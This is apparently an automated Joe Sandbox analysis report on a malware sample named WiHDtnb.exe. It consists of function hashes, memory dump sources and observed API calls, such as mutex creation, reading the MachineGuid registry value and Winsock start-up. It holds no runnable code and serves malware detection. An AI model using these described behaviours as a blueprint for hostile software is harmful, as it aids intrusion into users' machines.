Opcode ID: 604c9815d219d5c7256599e563244449f227fa71f89090ea8bfbd3b65b762fce
Instruction ID: 84860b3efe1628f5997ec52de8d511755c799fb4860abb34e91a7bac36395651
Opcode Fuzzy Hash: 604c9815d219d5c7256599e563244449f227fa71f89090ea8bfbd3b65b762fce
Instruction Fuzzy Hash: 9D515C34F002099BDB44DFA9C852BBEBAB2FB84714F108526ED16E7385DB749D02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0585B1A8 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a291f0517a2c21aea7234d56a3fc6d08a3ea691205e1a8a6207e309f798f0b42
Instruction ID: 74fd1d32ad65adbded8b358f6c922a3a29e4e933e392710632be6e217bb584d2
Opcode Fuzzy Hash: a291f0517a2c21aea7234d56a3fc6d08a3ea691205e1a8a6207e309f798f0b42
Instruction Fuzzy Hash: EE419E75E002198FCB04CFA9C884AEEBBF2BB49315F14846AD81AF7345DB349A45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0103D034 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2022172685.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_103d000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35eec355142c75f0e0244f7176f57cfad24bd7e429a63c85a752270065197ca6
Instruction ID: e7e7e8818f6f503fe0d787545059da89a1a1f78b663276002274c708dbd2da2d
Opcode Fuzzy Hash: 35eec355142c75f0e0244f7176f57cfad24bd7e429a63c85a752270065197ca6
Instruction Fuzzy Hash: 6C31AD7554C380AFD703DF64D994755BFB5AF86214F1885EAD8858B2A3C33A880ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0585B2B1 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ac11839d596f6f8932618334a7168391951724c239a9f8391898e9f43c711ea
Instruction ID: fa20f82463f629c8e3894f6a21472da29f971efd040d010e736b3407174e6881
Opcode Fuzzy Hash: 4ac11839d596f6f8932618334a7168391951724c239a9f8391898e9f43c711ea
Instruction Fuzzy Hash: DE316B75E042198FCB40CFA9D884AEEBBF1FB49315F54846AE819F7305D734AA458F60

Uniqueness

Uniqueness Score: -1.00%

Function 0585B5DC Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e69f8a40824a6f3c746d9b203b59655b2fc127769d31aa75d9a586c4e2bc763c
Instruction ID: 3e316f10c21ddfd16208604f244e98dcde6031c35cec74c80a2396a0e50ec047
Opcode Fuzzy Hash: e69f8a40824a6f3c746d9b203b59655b2fc127769d31aa75d9a586c4e2bc763c
Instruction Fuzzy Hash: FA213732E043095BCB05EF69DC41DEE7B7AEFC6324B408466E805D7255DB34AD08CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0585D980 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dd7409b500fa3a00948df6357c78c2cfff173a592171dd4820a8af181f9aa1e
Instruction ID: 5e3bc38fcc6178ebd3be0002bb58cf45af2cdf8d5313fcbce01c315957eb23b0
Opcode Fuzzy Hash: 4dd7409b500fa3a00948df6357c78c2cfff173a592171dd4820a8af181f9aa1e
Instruction Fuzzy Hash: FB213B3474A309DFD7198A288854B2A3BE7BBC1720F19C465DC43CB295CE74CD01C742

Uniqueness

Uniqueness Score: -1.00%

Function 0103D055 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2022172685.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_103d000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecbd9314ae26ba196d87f2f717a35ba8fa2dd6cded4f57f834060ca6e3e9bff9
Instruction ID: c4ddf71684d3d02c6cf7da9a2ab33f05f60bf2e110da3cf3737429d174e35695
Opcode Fuzzy Hash: ecbd9314ae26ba196d87f2f717a35ba8fa2dd6cded4f57f834060ca6e3e9bff9
Instruction Fuzzy Hash: 3921D0754083809FD703CF64D990715BFB5FB86214F28C5EAD8858B2A3C33AD80ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0103D294 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2022172685.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_103d000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 585450631962347cb96df88da6401f6597e5f661ef20c8ffcaf733fdb80483b8
Instruction ID: 5bc7c9ef045535043ce9e4adea59ce45fe21d4c6fc41da794a7ab5b661f0c07e
Opcode Fuzzy Hash: 585450631962347cb96df88da6401f6597e5f661ef20c8ffcaf733fdb80483b8
Instruction Fuzzy Hash: B8210775504204EFDB05DFA8D5C0B2ABFA9FBC4314F64C5ADD9894B252C33AD806CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0103D0DC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2022172685.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_103d000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cdcfb2c12eca588c2af06ba88fcaea006dcb1d51497c334a867411881be11d8
Instruction ID: f5d68367e8bfc4d2feac9f42fc874816d48e76ef1a06868394afa2143b55e7db
Opcode Fuzzy Hash: 5cdcfb2c12eca588c2af06ba88fcaea006dcb1d51497c334a867411881be11d8
Instruction Fuzzy Hash: CB21F571504204EFDB05DF58D980B16BBA9FBC4314F60C5ADE9494B356C33AD446CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0585B5C8 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67e5eb24f62c3d84fbefbd52a161db0894345fc5252f99e760f91645d050a604
Instruction ID: 0684c965f4339c79b979d05fdb4a0861ab8075a0cb4d128af8ff9d32c5485da0
Opcode Fuzzy Hash: 67e5eb24f62c3d84fbefbd52a161db0894345fc5252f99e760f91645d050a604
Instruction Fuzzy Hash: 1B113D329082546BD701EB2DD850AAA7FFADFC2324B04C0D7DC55CB166D638C849CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0585C3B0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c2a520d7a5e3f5b54fb8d7b885baf25348dc0900a7416b886d4ceaa20f0d37f
Instruction ID: 1d674342bee0ed3b5f23af8ef7c55487d80788e2cadfe0febd669bc0d9b60397
Opcode Fuzzy Hash: 2c2a520d7a5e3f5b54fb8d7b885baf25348dc0900a7416b886d4ceaa20f0d37f
Instruction Fuzzy Hash: 7011E1B5B193889FCB06CB748C59A6E7FF9AF46200B1504EAEC45C7293ED349D099712

Uniqueness

Uniqueness Score: -1.00%

Function 0585B5EC Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 562c20d303455b0faed02a5c7bb06fdb9c4471d4192b91ea41f6f980552e5342
Instruction ID: ca5d1fd922d6de2fce79469e559ef3d94e255dde9397a8c1e7f5b33bece20a98
Opcode Fuzzy Hash: 562c20d303455b0faed02a5c7bb06fdb9c4471d4192b91ea41f6f980552e5342
Instruction Fuzzy Hash: 0B2114B59043499FCB10CF9AD888BDEBFF4FB48320F10841AE919A7210D379A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0585C528 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 008f092cf60644fe4b16c53a0f48eef0e62a8544c98559deb4a97f4b068d57aa
Instruction ID: ed75c993b77245dab1a34f9f9def37424b9bb13342e62b767e559a50adc6d33c
Opcode Fuzzy Hash: 008f092cf60644fe4b16c53a0f48eef0e62a8544c98559deb4a97f4b068d57aa
Instruction Fuzzy Hash: 9B21E4B59003599FCB20DF9AD984ADEBFF4FB48320F10841AE919A7210D379A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0103D28F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2022172685.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_103d000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: d4cb1c202440770787368fac336243d491c45d12cac470de4e05674b151e654a
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: A2119D75504280DFDB06CF54D5C4B15BFB1FB84314F24C6A9D9894B657C33AD84ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00D1D199 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2021379807.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d1d000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46f8c965d6290955a6dd73c5c4e108e58249892801d7f7ff1612c9e60f0ebdf4
Instruction ID: 8e42a797c599d72c8f4c1c74cf27850bf589f46367439ed386a23f1ce82d656e
Opcode Fuzzy Hash: 46f8c965d6290955a6dd73c5c4e108e58249892801d7f7ff1612c9e60f0ebdf4
Instruction Fuzzy Hash: 2F012B31004344BAE7208B5AED84BA7BF9DEF45320F1CC42AED490A296C739DCC0C671

Uniqueness

Uniqueness Score: -1.00%

Function 0585C458 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 109317e0db9d484bbffd5d5d33a8352c294d4929dbc8a4f2deb6db1c2bc38686
Instruction ID: 393505c77524ae9a37e217e80ff904a83a84e5532cfd2934fefcd486f771408e
Opcode Fuzzy Hash: 109317e0db9d484bbffd5d5d33a8352c294d4929dbc8a4f2deb6db1c2bc38686
Instruction Fuzzy Hash: 82F096B6B002046FDB05DF59D845EAE7BBAEBD4360B04C1AAEC18D7215D634DE119F90

Uniqueness

Uniqueness Score: -1.00%

Function 00D1D198 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2021379807.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d1d000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c88e1d566da2a299d4859ab6925528219d71307dcba49f8a17b21e7e93c184dc
Instruction ID: 48a8abf99c9f85b5aa4ff3d7cbfc0234d0156c7c1fd3dbb27183e2e493b45063
Opcode Fuzzy Hash: c88e1d566da2a299d4859ab6925528219d71307dcba49f8a17b21e7e93c184dc
Instruction Fuzzy Hash: 54F06271404344AAE7208A1ADC84BA2FFA9EF95734F18C55AED484A296C3799C84CA75

Uniqueness

Uniqueness Score: -1.00%

Function 0585B543 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2ff0b96fc70054baa6afbbe814618b1e5400433f16bcf19ad779244502ab190
Instruction ID: c2b937be86a69d2b92a14294b5bce3c074eb8c49d022b9699121e9ad9e82d61a
Opcode Fuzzy Hash: c2ff0b96fc70054baa6afbbe814618b1e5400433f16bcf19ad779244502ab190
Instruction Fuzzy Hash: 5CF09A2200CBD129E302933CCD61B827E40AF53339F18079AD8E0850F2D709444AC62B

Uniqueness

Uniqueness Score: -1.00%

Function 0585FA28 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a37d418d0fc66729f82dc5b01489b78d2815269f73a359cd1b981dda0998174
Instruction ID: 955b5718569e7b6ae26cff3936eec5c73a758e3a010542abce3e6ad5099524fd
Opcode Fuzzy Hash: 0a37d418d0fc66729f82dc5b01489b78d2815269f73a359cd1b981dda0998174
Instruction Fuzzy Hash: 19C08C3006520C8BC2052BA8E61F3287EA8A709217F800410FA2A820908E788410C612

Uniqueness

Uniqueness Score: -1.00%

Function 0585B58C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b90734ed2c27ba539850b8465d0b61d75dc68055f2aa229dee27bf61cb7a1ff
Instruction ID: fa3b830e8ee0aaf20ecc9a88c4aec54db242e4d0caab8dcb79929977c9039301
Opcode Fuzzy Hash: 2b90734ed2c27ba539850b8465d0b61d75dc68055f2aa229dee27bf61cb7a1ff
Instruction Fuzzy Hash: 22B012792A5340AA8105A26C49C8F3B9451EFB1715B90DC113F05C00908965CC78D91B

Uniqueness

Uniqueness Score: -1.00%

Function 0585C430 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91d091756319f945606cfce6e8c4b2bb2dc94b577d40771e2dc7746b54ade9b
Instruction ID: 0d726fca358ee6a29ba82e301a88047db178cb9a5f711c961a74c1560059e2da
Opcode Fuzzy Hash: a91d091756319f945606cfce6e8c4b2bb2dc94b577d40771e2dc7746b54ade9b
Instruction Fuzzy Hash: AAB012FB9347406BFF005150CC46B465370DF70726F845010A60480681E9658663A733

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 05855A88 Relevance: 14.2, Strings: 11, Instructions: 455COMMON

Download Yara Rule

Strings

Te]q, xrefs: 05855D39
Te]q, xrefs: 05855D5E
$]q, xrefs: 05855FF3
Te]q, xrefs: 05855AD4
Te]q, xrefs: 05855BF7
$]q, xrefs: 05855FE7
Te]q, xrefs: 05855D6E
$]q, xrefs: 05855F0F
Te]q, xrefs: 05855C96
Te]q, xrefs: 05855B21
$]q, xrefs: 05855F1B

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID: Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$Te]q$$]q$$]q$$]q$$]q
API String ID: 0-2237115325
Opcode ID: 8daa72a064d03ba991927877b9d68c900691c70bfed87c4a3b6f54a6d6fff793
Instruction ID: 903483bdd31142ffc04dcb9a8e849dbb5d89b0e9c0baccbf04d7a335df1dbf1e
Opcode Fuzzy Hash: 8daa72a064d03ba991927877b9d68c900691c70bfed87c4a3b6f54a6d6fff793
Instruction Fuzzy Hash: B5F17D30B44208DFDB149BA8D959BBD7AE7BF88710F644825ED02EB394DB789C41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05855A78 Relevance: 7.9, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

Te]q, xrefs: 05855D39
Te]q, xrefs: 05855D5E
Te]q, xrefs: 05855AD4
$]q, xrefs: 05855FE7
$]q, xrefs: 05855F0F
Te]q, xrefs: 05855B21

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID: Te]q$Te]q$Te]q$Te]q$$]q$$]q
API String ID: 0-3261640282
Opcode ID: 3a5bbd529f0555f10daa5a97eefffbb7ff18480fd24cf00fa47beaae997035d1
Instruction ID: cca68ab6a7f78024ef305f52d5386fc0daf5b579072b7fc87a4c41228c3eedc8
Opcode Fuzzy Hash: 3a5bbd529f0555f10daa5a97eefffbb7ff18480fd24cf00fa47beaae997035d1
Instruction Fuzzy Hash: C1E17B30B44208DFDB149BA8D959BBD7AE2BF88721F144825FD06EB394DB789C41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05854A0B Relevance: 6.3, Strings: 5, Instructions: 65COMMON

Download Yara Rule

Strings

4']q, xrefs: 05854ADF
4']q, xrefs: 05854A99
4']q, xrefs: 05854A53
4']q, xrefs: 05854A76
4']q, xrefs: 05854ABC

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q
API String ID: 0-4248691736
Opcode ID: 34e8342c904ea208e8d90fd9b040744ff9842ab9dbb91026c2b3f7cb1072ad30
Instruction ID: c692043e088c2e2149af28da5ba3cf42f7cf606884d01d929bb90e013236689d
Opcode Fuzzy Hash: 34e8342c904ea208e8d90fd9b040744ff9842ab9dbb91026c2b3f7cb1072ad30
Instruction Fuzzy Hash: 64213370A0010A9FCF0CEFADE951AEE7BB6FF84704F1044A89145A72A5DF356E058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 05854A18 Relevance: 6.3, Strings: 5, Instructions: 62COMMON

Download Yara Rule

Strings

4']q, xrefs: 05854ADF
4']q, xrefs: 05854A99
4']q, xrefs: 05854A53
4']q, xrefs: 05854A76
4']q, xrefs: 05854ABC

Memory Dump Source

Source File: 00000009.00000002.2025130993.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5850000_WiHDtnb.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q
API String ID: 0-4248691736
Opcode ID: 4be1d12c4a10b78cef164d8f0ec1a881cd9e585161692d5ee5b84417c6cbc54a
Instruction ID: f18cfb91285b0c453bb09b364c7ca3493e1709c3157311bb54ba93e466f2ada0
Opcode Fuzzy Hash: 4be1d12c4a10b78cef164d8f0ec1a881cd9e585161692d5ee5b84417c6cbc54a
Instruction Fuzzy Hash: 54214470A0010A9FCF0CEFADE591AEE7BB6FF84700F1044A88045A72A5DF356E05CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: WiHDtnb.exePID: 6148, Parent PID: 3220COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	302
Total number of Limit Nodes:	13

Executed Functions

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Uniqueness

Uniqueness Score: -1.00%

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Uniqueness

Uniqueness Score: -1.00%

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Uniqueness

Uniqueness Score: -1.00%

Function 00413A3F Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54

Memory Dump Source

Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

Uniqueness

Uniqueness Score: -1.00%

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_WiHDtnb.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

